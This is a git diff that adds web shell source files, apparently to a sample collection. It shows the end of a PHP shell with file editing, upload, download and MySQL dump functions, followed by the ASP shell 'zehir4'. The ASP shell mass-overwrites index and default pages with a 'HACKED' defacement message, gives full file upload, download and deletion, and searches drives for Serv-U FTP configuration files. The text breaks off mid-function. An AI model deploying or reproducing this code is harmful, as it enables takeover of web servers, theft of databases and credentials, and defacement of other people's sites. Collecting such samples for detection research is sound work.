+$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
+$group=@posix_getgrgid(@filegroup($work_dir.$fn));
+printf("% 20s|% -20s",$owner['name'],$group['name']);
+}
+echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
+printf("% 20s ",@filesize($work_dir.$fn).'B');
+printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
+}
+echo('</pre><hr>');
+?>
+<form name='list' method=post>
+<input name='work_dir' type=hidden size=120><br>
+<input name='page' value='cmd' type=hidden>
+<input name='f_action' value='view' type=hidden>
+</form>
+<?
+} else echo('Error Listing '.$e_work_dir);
+}
+else
+switch($f_action)
+{
+case 'view':
+{
+echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n");
+$f=@fopen($work_dir,'r');
+?>
+<form method=post>
+<textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea>
+<input name='page' value='cmd' type=hidden>
+<input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120>
+<input name='f_action' value='save' type=submit>
+</form>
+<?
+break;
+}
+case 'save' :
+{
+$file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):'';
+$f=@fopen($work_dir,'w');
+if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n");
+else
+{
+fwrite($f,$file_text);
+fclose($f);
+echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
+}
+break;
+}
+}
+break;
+}
+break;
+}
+case 'upload' :
+{
+if($work_dir=='')$work_dir='/';
+else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
+$f=$_FILES["filename"]["name"];
+if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
+else
+{
+echo('file is uploaded in '.$e_work_dir);
+}
+break;
+}
+case 'download' :
+{
+$fname=isset($_POST['fname'])?$_POST['fname']:'';
+$temp_file=isset($_POST['temp_file'])?'on':'nn';
+$f=@fopen($fname,'r');
+if(!($f)) echo('file is not exists');
+else
+{
+$archive=isset($_POST['archive'])?$_POST['archive']:'';
+if($archive=='gzip')
+{
+Header("Content-Type:application/x-gzip\n");
+$s=gzencode(fread($f,filesize($fname)));
+Header('Content-Length: '.strlen($s)."\n");
+Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n");
+echo($s);
+}
+else
+{
+Header("Content-Type:application/octet-stream\n");
+Header('Content-Length: '.filesize($fname)."\n");
+Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n");
+ob_start();
+while(feof($f)===false)
+{
+echo(fread($f,10000));
+ob_flush();
+}
+}
+}
+}
+}
+break;
+}
+case 'mysql' :
+{
+$action=isset($_POST['action'])?$_POST['action']:'query';
+$user=isset($_POST['user'])?$_POST['user']:'';
+$passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
+$db=isset($_POST['db'])?$_POST['db']:'';
+$host=isset($_POST['host'])?$_POST['host']:'localhost';
+$query=isset($_POST['query'])?magic_q($_POST['query']):'';
+switch($action)
+{
+case 'dump' :
+{
+$mysql_link=@mysql_connect($host,$user,$passwd);
+if(!($mysql_link)) echo('Connect error');
+else
+{
+//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
+$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
+$archive=isset($_POST['archive'])?$_POST['archive']:'none';
+if($archive!=='none')$to_file=false;
+$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
+$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
+if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
+else
+{
+$dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n";
+ob_start();
+if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false;
+if($table_dump=='')
+{
+if(!$to_file)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+$result=mysql_query('show tables',$mysql_link);
+for($i=0;$i<mysql_num_rows($result);$i++)
+{
+$rows=mysql_fetch_array($result);
+$result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link);
+if(!$result2)$dump_file.='#error table '.$rows[0];
+else
+{
+$dump_file.='create table `'.$rows[0]."`(\n";
+for($j=0;$j<mysql_num_rows($result2)-1;$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
+}
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
+$type[$j]=$rows2[1];
+$dump_file.=");\n";
+mysql_free_result($result2);
+$result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link);
+$columns=$j-1;
+for($j=0;$j<mysql_num_rows($result2);$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='insert into `'.$rows[0].'` values (';
+for($k=0;$k<$columns;$k++)
+{
+$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
+}
+$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
+if($archive=='none')
+{
+if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
+else
+{
+echo($dump_file);
+ob_flush();
+}
+$dump_file='';
+}
+}
+mysql_free_result($result2);
+}
+}
+mysql_free_result($result);
+if($archive!='none')
+{
+$dump_file=gzencode($dump_file);
+header('Content-Length: '.strlen($dump_file)."\n");
+echo($dump_file);
+}
+else if($t_f)
+{
+fclose($t_f);
+echo('Dump for '.$db_dump.' now in '.$to_file);
+}
+}
+else
+{
+$result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link);
+if(!$result2)echo('error table '.$table_dump);
+else
+{
+if(!$to_file)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+if($to_file===false)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+$dump_file.="create table `{$table_dump}`(\n";
+for($j=0;$j<mysql_num_rows($result2)-1;$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
+}
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
+$type[$j]=$rows2[1];
+$dump_file.=");\n";
+mysql_free_result($result2);
+$result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link);
+$columns=$j-1;
+for($j=0;$j<mysql_num_rows($result2);$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='insert into `'.$table_dump.'` values (';
+for($k=0;$k<$columns;$k++)
+{
+$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
+}
+$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
+if($archive=='none')
+{
+if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
+else
+{
+echo($dump_file);
+ob_flush();
+}
+$dump_file='';
+}
+}
+mysql_free_result($result2);
+if($archive!='none')
+{
+$dump_file=gzencode($dump_file);
+header('Content-Length: '.strlen($dump_file)."\n");
+echo $dump_file;
+}else if($t_f)
+{
+fclose($t_f);
+echo('Dump for '.$db_dump.' now in '.$to_file);
+}
+}
+}
+}
+}
+break;
+}
+case 'query' :
+{
+echo($head.$pages);
+?>
+<hr>
+<form method=post>
+<table>
+<td>
+<table align=left>
+<tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host' type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr>
+<tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr>
+</table>
+</td>
+<td>
+<table>
+<tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr>
+<tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
+<input name='archive' type=radio value='none'>without arch
+<input name='archive' type=radio value='gzip' checked=true>gzip archive
+<tr><td><input type=submit name='action' value='dump'></td></tr>
+<tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
+</table>
+</td>
+</table>
+<input name='page' value='mysql' type=hidden>
+<input name='action' value='query' type=submit>
+</form>
+<hr>
+<?
+$mysql_link=@mysql_connect($host,$user,$passwd);
+if(!($mysql_link)) echo('Connect error');
+else
+{
+if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;}
+//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
+$result=@mysql_query($query,$mysql_link);
+if(!($result))echo(mysql_error());
+else
+{
+echo("<table valign=top align=left>\n<tr>");
+for($i=0;$i<mysql_num_fields($result);$i++)
+echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b>  </td>');
+echo("\n</tr>\n");
+for($i=0;$i<mysql_num_rows($result);$i++)
+{
+$rows=mysql_fetch_array($result);
+echo('<tr valign=top align=left>');
+for($j=0;$j<mysql_num_fields($result);$j++)
+{
+echo('<td>'.(htmlspecialchars($rows[$j])).'</td>');
+}
+echo("</tr>\n");
+}
+echo("</table>\n");
+}
+mysql_close($mysql_link);
+}
+break;
+}
+}
+break;
+}
+}
+?>
\ No newline at end of file
diff --git a/php/zehir4.asp.php.txt b/php/zehir4.asp.php.txt
new file mode 100644
index 0000000..e911155
--- /dev/null
+++ b/php/zehir4.asp.php.txt
@@ -0,0 +1,1190 @@
+<%
+mpat=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\")
+dosyaPath = mid(mpat,InStrRev(mpat,"\")+1)
+on error resume next
+Dim objFSO,popup
+Set objFSO = CreateObject ("Scripting.FileSystemObject")
+if Request("kuskapani")=1 then
+    Response.End
+end if
+
+
+if Request("kuskapani")=2 then
+    on error resume next
+    path = Request("path")
+    sFolder = Request("SubFolder")
+    fName = Request("FileName")
+    d1 = Request("dosya1")
+    d2 = Request("dosya2")
+    d3 = Request("dosya3")
+    d4 = Request("dosya4")
+    bg__ = Request.Form("selectColour")
+    if bg__ = "0" then bg__ = "#ffffff"
+    byMesaj = "<body bgColor='"&bg__&"'>" & Request("byMesaj") & "<br><br><center><font color=gray size=2>HACKED " & Session("n2") & "3 ;)</font>"
+
+    sFolder = Replace(sFolder,"/","\")
+
+    if Right(sFolder,1)<>"\" then sFolder = sFolder & "\"
+    Set f = objFSO.GetFolder(Path)
+    Set fc = f.SubFolders
+    h__ = 0
+    f__ = 0
+    ss__ = now
+    For Each f1 In fc
+        hedef_ = replace(f1.path,"/","\")
+        if Right(hedef_,1)<>"\" then hedef_ = hedef_ & "\"
+        hedef__ = left(hedef_,len(hedef_)-1)
+        folderName_ = Right(hedef__, len(hedef__)-instrrev(hedef__,"\"))
+            if d1<>"" then d1 = true
+            if d2<>"" then d2 = true
+            if d3<>"" then d3 = true
+            if d4<>"" then d4 = true
+            on error goto 0:on error resume next
+            if fName<>"" then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & fName, True)
+                MyFile.write byMesaj
+            end if
+            if d1 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.htm", True)
+                MyFile.write byMesaj
+            end if
+            if d2 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.htm", True)
+                MyFile.write byMesaj
+            end if
+            if d3 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.asp", True)
+                MyFile.write byMesaj
+            end if
+            if d4 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.asp", True)
+                MyFile.write byMesaj
+            end if
+
+            if err<>0 then
+                response.Write folderName_ & " <font color=red>[FAILED!]</font><br>"
+                f__ = f__ + 1
+            else
+                response.Write folderName_ & " <font color=blue>[HACKED]</font><br>"
+                h__ = h__ + 1
+            end if
+    Next
+    ss___ = now
+    response.Write "<br><font color=white>by zehir!...</font><br><b>Sonuc : </b> Toplam Süre : "&left(ss__-ss___,5)&"sn. ;)<br><font color=blue>Hacked</font> = "&h__&"<br><font color=red>Failed</font> = "&f__
+    response.End
+end if
+
+status = Request("status")
+path   = Request("path")
+dPath  = Request("dPath")
+arama  = Request("txArama")
+dkayit = Request("dkayit")
+table  = Request("table")
+del    = Request("del")
+islem  = Request("islem")
+strSQL = Request("strSQL")
+cf       = Request("cf")
+pathfile = request("pathfile")
+if path="" then path=request.servervariables("APPL_PHYSICAL_PATH")
+if status="" then status=2
+popup = true
+'////////////////////////////////
+Function ReadBinaryFile(FileName)
+  Const adTypeBinary = 1
+  Dim BinaryStream
+  Set BinaryStream = CreateObject("ADODB.Stream")
+  BinaryStream.Type = adTypeBinary
+  BinaryStream.Open
+  BinaryStream.LoadFromFile FileName
+  ReadBinaryFile = BinaryStream.Read
+End Function
+if status="-3" then
+    Response.Buffer=True
+    Set Fil = objFSO.GetFile(pathfile)
+
+    Response.contenttype="application/force-download"
+    Response.AddHeader "Cache-control","private"
+    Response.AddHeader "Content-Length", Fil.Size
+    Response.AddHeader "Content-Disposition", "attachment; filename=" & Fil.name
+
+    Response.BinaryWrite readBinaryFile(Fil.path)
+    Set f = Nothing: Set Fil = Nothing
+    response.End()
+end if
+'//////////////////////////////////
+if status="-4" then popup=false
+if status="13" then popup=false
+if status="14" then popup=false
+if status="15" then popup=false
+if status="16" then popup=false
+if status="17" then popup=false
+if status="18" then popup=false
+if status="19" then popup=false
+if status="33" then popup=false
+if status="40" then popup=false
+if status="50" then popup=false
+byMsg = request.QueryString("byMsg")
+if byMsg<>"" then response.Write byMsg
+response.Write "<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&gt;</title>"
+if popup then
+%>
+<center>
+<a href="<%=dosyaPath%>?mevla=1&status=13" onclick="sistemBilgisi(this.href);return false;">System Info</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=40" onclick="sistemTest(this.href);return false;">System Test</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=50&path=<%=path%>" onclick="SitelerTestte(this.href);return false;">Sites Test</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=14&path=<%=path%>" onclick="klasorIslemleri(this.href);return false;">Folder Action</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=15" onclick="sqlServer(this.href);return false;">SQL Server</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=33" onclick="poweredby(this.href);return false;">POWERED BY</a>
+<script language=javascript>
+    function sistemBilgisi(yol){
+        NewWindow(yol,"",600,240,"no");
+    }
+    function SitelerTestte(yol){
+        NewWindow(yol,"",530,420,"no");
+    }
+    function klasorIslemleri(yol){
+        NewWindow(yol,"",400,280,"no");
+    }
+    function sqlServer(yol){
+        NewWindow(yol,"",300,50,"no");
+    }
+    function poweredby(yol){
+        NewWindow(yol,"",300,50,"no");
+    }
+    function sistemTest(yol){
+        NewWindow(yol,"",400,300,"no");
+    }
+</script>
+<%
+end if
+'####################################
+Class clsUpload
+    Private mbinData
+    Private mlngChunkIndex
+    Private mlngBytesReceived
+    Private mstrDelimiter
+    Private CR
+    Private LF
+    Private CRLF
+    Private mobjFieldAry()
+    Private mlngCount
+
+    Private Sub RequestData
+        Dim llngLength
+        mlngBytesReceived = Request.TotalBytes
+        mbinData = Request.BinaryRead(mlngBytesReceived)
+    End Sub
+
+    Private Sub ParseDelimiter()
+        mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1)
+    End Sub
+
+    Private Sub ParseData()
+        Dim llngStart
+        Dim llngLength
+        Dim llngEnd
+        Dim lbinChunk
+        llngStart = 1
+        llngStart = InStrB(llngStart, mbinData, mstrDelimiter & CRLF)
+        While Not llngStart = 0
+            llngEnd = InStrB(llngStart + 1, mbinData, mstrDelimiter) - 2
+            llngLength = llngEnd - llngStart
+            lbinChunk = MidB(mbinData, llngStart, llngLength)
+            Call ParseChunk(lbinChunk)
+            llngStart = InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF)
+        Wend
+    End Sub
+
+    Private Sub ParseChunk(ByRef pbinChunk)
+        Dim lstrName
+        Dim lstrFileName
+        Dim lstrContentType
+        Dim lbinData
+        Dim lstrDisposition
+        Dim lstrValue
+        lstrDisposition = ParseDisposition(pbinChunk)
+        lstrName = ParseName(lstrDisposition)
+        lstrFileName = ParseFileName(lstrDisposition)
+        lstrContentType = ParseContentType(pbinChunk)
+        If lstrContentType = "" Then
+            lstrValue = CStrU(ParseBinaryData(pbinChunk))
+        Else
+            lbinData = ParseBinaryData(pbinChunk)
+        End If
+        Call AddField(lstrName, lstrFileName, lstrContentType, lstrValue, lbinData)
+    End Sub
+
+    Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData)
+        Dim lobjField
+        ReDim Preserve mobjFieldAry(mlngCount)
+        Set lobjField = New clsField
+        lobjField.Name = pstrName
+        lobjField.FilePath = pstrFileName
+        lobjField.ContentType = pstrContentType
+        If LenB(pbinData) = 0 Then
+            lobjField.BinaryData = ChrB(0)
+            lobjField.Value = pstrValue
+            lobjField.Length = Len(pstrValue)
+        Else
+            lobjField.BinaryData = pbinData
+            lobjField.Length = LenB(pbinData)
+            lobjField.Value = ""
+        End If
+        Set mobjFieldAry(mlngCount) = lobjField
+        mlngCount = mlngCount + 1
+    End Sub
+
+    Private Function ParseBinaryData(ByRef pbinChunk)
+        Dim llngStart
+        llngStart = InStrB(1, pbinChunk, CRLF & CRLF)
+        If llngStart = 0 Then Exit Function
+        llngStart = llngStart + 4
+        ParseBinaryData = MidB(pbinChunk, llngStart)
+    End Function
+
+    Private Function ParseContentType(ByRef pbinChunk)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Type:"), vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStrB(llngStart + 15, pbinChunk, CR)
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 15
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength)))
+    End Function
+
+    Private Function ParseDisposition(ByRef pbinChunk)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStrB(llngStart + 22, pbinChunk, CRLF)
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 22
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength))
+    End Function
+
+    Private Function ParseName(ByRef pstrDisposition)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStr(1, pstrDisposition, "name=""", vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStr(llngStart + 6, pstrDisposition, """")
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 6
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseName = Mid(pstrDisposition, llngStart, llngLength)
+    End Function
+' ------------------------------------------------------------------------------
+    Private Function ParseFileName(ByRef pstrDisposition)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStr(1, pstrDisposition, "filename=""", vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStr(llngStart + 10, pstrDisposition, """")
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 10
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseFileName = Mid(pstrDisposition, llngStart, llngLength)
+    End Function
+
+    Public Property Get Count()
+        Count = mlngCount
+    End Property
+
+    Public Default Property Get Fields(ByVal pstrName)
+        Dim llngIndex
+        If IsNumeric(pstrName) Then
+            llngIndex = CLng(pstrName)
+            If llngIndex > mlngCount - 1 Or llngIndex < 0 Then
+                Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not exist within the ordinal reference.")
+                Exit Property
+            End If
+            Set Fields = mobjFieldAry(pstrName)
+        Else
+            pstrName = LCase(pstrname)
+            For llngIndex = 0 To mlngCount - 1
+                If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then
+                    Set Fields = mobjFieldAry(llngIndex)
+                    Exit Property
+                End If
+            Next
+        End If
+        Set Fields = New clsField
+    End Property
+
+    Private Sub Class_Terminate()
+        Dim llngIndex
+        For llngIndex = 0 To mlngCount - 1
+            Set mobjFieldAry(llngIndex) = Nothing
+
+        Next
+        ReDim mobjFieldAry(-1)
+    End Sub
+
+    Private Sub Class_Initialize()
+        ReDim mobjFieldAry(-1)
+        CR = ChrB(Asc(vbCr))
+        LF = ChrB(Asc(vbLf))
+        CRLF = CR & LF
+        mlngCount = 0
+        Call RequestData
+        Call ParseDelimiter()
+        Call ParseData
+    End Sub
+
+    Private Function CStrU(ByRef pstrANSI)
+        Dim llngLength
+        Dim llngIndex
+        llngLength = LenB(pstrANSI)
+        For llngIndex = 1 To llngLength
+            CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1)))
+        Next
+    End Function
+
+    Private Function CStrB(ByRef pstrUnicode)
+        Dim llngLength
+        Dim llngIndex
+        llngLength = Len(pstrUnicode)
+        For llngIndex = 1 To llngLength
+            CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1)))
+        Next
+    End Function
+End Class
+'####################################
+Session("n1") = "by Ejder"
+Class clsField
+    Public Name
+    Private mstrPath
+    Public FileDir
+    Public FileExt
+    Public FileName
+    Public ContentType
+    Public Value
+    Public BinaryData
+    Public Length
+    Private mstrText
+
+    Public Property Get BLOB()
+        BLOB = BinaryData
+    End Property
+
+    Public Function BinaryAsText()
+        Dim lbinBytes
+        Dim lobjRs
+        If Length = 0 Then Exit Function
+        If LenB(BinaryData) = 0 Then Exit Function
+
+        If Not Len(mstrText) = 0 Then
+            BinaryAsText = mstrText
+            Exit Function
+        End If
+        lbinBytes = ASCII2Bytes(BinaryData)
+           mstrText = Bytes2Unicode(lbinBytes)
+        BinaryAsText = mstrText
+    End Function
+
+    Public Sub SaveAs(ByRef pstrFileName)
+        Const adTypeBinary=1
+        Const adSaveCreateOverWrite=2
+        Dim lobjStream
+        Dim lobjRs
+        Dim lbinBytes
+        If Length = 0 Then Exit Sub
+        If LenB(BinaryData) = 0 Then Exit Sub
+        Set lobjStream = Server.CreateObject("ADODB.Stream")
+        lobjStream.Type = adTypeBinary
+        Call lobjStream.Open()
+        lbinBytes = ASCII2Bytes(BinaryData)
+        Call lobjStream.Write(lbinBytes)
+
+        On Error Resume Next
+
+        Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite)
+
+        'if err<>0 then response.Write "<br>"&err.Description
+
+        Call lobjStream.Close()
+        Set lobjStream = Nothing
+    End Sub
+
+    Public Property Let FilePath(ByRef pstrPath)
+        mstrPath = pstrPath
+        If Not InStrRev(pstrPath, ".") = 0 Then
+            FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1)
+            FileExt = UCase(FileExt)
+        End If
+        If Not InStrRev(pstrPath, "\") = 0 Then
+            FileName = Mid(pstrPath, InStrRev(pstrPath, "\") + 1)
+        End If
+        If Not InStrRev(pstrPath, "\") = 0 Then
+            FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "\") - 1)
+        End If
+    End Property
+
+    Public Property Get FilePath()
+        FilePath = mstrPath
+    End Property
+
+    private Function ASCII2Bytes(ByRef pbinBinaryData)
+        Const adLongVarBinary=205
+        Dim lobjRs
+        Dim llngLength
+        Dim lbinBuffer
+        llngLength = LenB(pbinBinaryData)
+        Set lobjRs = Server.CreateObject("ADODB.Recordset")
+        Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength)
+        Call lobjRs.Open()
+        Call lobjRs.AddNew()
+        Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0))
+        Call lobjRs.Update()
+        lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength)
+        Call lobjRs.Close()
+        Set lobjRs = Nothing
+        ASCII2Bytes = lbinBuffer
+    End Function
+
+    Private Function Bytes2Unicode(ByRef pbinBytes)
+        Dim lobjRs
+        Dim llngLength
+        Dim lstrBuffer
+        llngLength = LenB(pbinBytes)
+        Set lobjRs = Server.CreateObject("ADODB.Recordset")
+        Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength)
+        Call lobjRs.Open()
+        Call lobjRs.AddNew()
+        Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes)
+        Call lobjRs.Update()
+        lstrBuffer = lobjRs.Fields("BinaryData").Value
+        Call lobjRs.Close()
+        Set lobjRs = Nothing
+        Bytes2Unicode = lstrBuffer
+    End Function
+End Class
+Session("n2") = "EJDER"
+'####################################
+function addslash(path)
+    if right(path,1)="\" then addslash=path else addslash=path & "\"
+end function
+
+sub Upload()
+    dim objUpload,f,max,i,name,path,size,success
+
+    set objUpload=New clsUpload
+
+    targetPath=objUpload.Fields("folder").Value
+    max=objUpload.Fields("max").Value
+
+    for i=1 to max
+        name=objUpload.Fields("file" & i).FileName
+        size=objUpload.Fields("file" & i).Length
+        if (name<>"") and (size>0) then
+            gMsg=gMsg & "<br>" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): "
+            path=addslash(targetPath) & name
+            objUpload.Fields("file" & i).SaveAs path
+
+            if objFSO.FileExists(path) then
+                on error resume next
+                set f=objFSO.GetFile(path)
+                if IsObject(f) then
+                    if f.Size=size then success=true else success=false
+                end if
+                set f=nothing
+            end if
+            if success then  gMsg=gMsg & "<font color=blue>uploaded</font>" else gMsg = gMsg & "<font color=red>failed!</font>"
+        end if
+    next
+    response.Write gMsg
+    set objUpload=nothing
+
+end sub
+
+if status="-4" then
+    Upload()
+'    hataKontrol
+    popup=false
+end if
+'////////////////////////////////
+sub hataKontrol
+    if err<>0 then
+        Response.Write "<font color=red size=2>Hata : "&err.Description&"</font>"
+    end if
+end sub
+
+sub araBul(path_,ara_)
+    on error resume next
+    If Len(path_) > 0 Then
+        cur = path_&"\"
+        If cur = "\\" Then cur = ""
+            parent = ""
+            If InStrRev(cur,"\") > 0 Then
+            parent = Left(cur, InStrRev(cur, "\", Len(cur)-1))
+        End If
+    Else
+        cur = ""
+    End If
+
+    Set f = objFSO.GetFolder(cur)
+
+    Set fc = f.Files
+    For Each f1 In fc
+        if lcase(InStr(1,f1.name,lcase(ara_)))>0 then
+            downStr = "<font face=webdings size=5><a href='"&dosyapath&"?status=-3&pathFile="&f1.path&"&Time="&time&"'>Í</a></font>"
+            if lcase(ara_)="mdb" then
+                Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a></font> * <a href='"&dosyapath&"?status=7&path="&f1.path&"&Time="&time&"'>"&f1.path&" ["&f1.size&"]"&"</a></b><br>"
+            else
+                Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a><a href='"&dosyapath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a></font> - <a href='"&dosyapath&"?status=5&path="&f1.path&"&Time="&time&"'>"&f1.path&" ["&f1.size&"]"&"</a></b><br>"
+            end if
+        end if
+    Next
+
+    Set fs = f.SubFolders
+    For Each f1 In fs
+        araBul f1.path,ara_
+    Next
+    Set    f        = Nothing
+    Set fc        = Nothing
+    Set fs        = Nothing
+end sub
+
+sub sistemTest
+    response.Write "<table width='100%' align=center cellpadding=0 cellspacing=0 border=1>"
+    response.Write "<tr bgcolor=#ffffc0><td width='30%' align=center><font color=navy><b>Konum</td><td width='70%' align=center><font color=navy><b>Sonuç</td></tr>"
+
+    servu_Test
+    WriteTestOnDriver
+    WriteTestOnLocalPath
+    LocalPathParentFolder
+    LocalPathPParentFolder
+
+    response.Write "</table>"
+end sub
+
+sub servu_Test
+    dosya_ = Array("Program Files\Serv-u\Serv-u.ini", "Program Files\Serv-u\Serv-u daemon.ini", "Serv-u\Serv-u.ini", "Serv-u\Serv-u daemon.ini")
+    for each drive_ in objFSO.Drives
+        if drive_.Drivetype=2 or drive_.Drivetype=3 then
+            for each d_ in dosya_
+                d_ = drive_.DriveLetter&":\"&d_
+                if objFSO.FileExists(d_) then
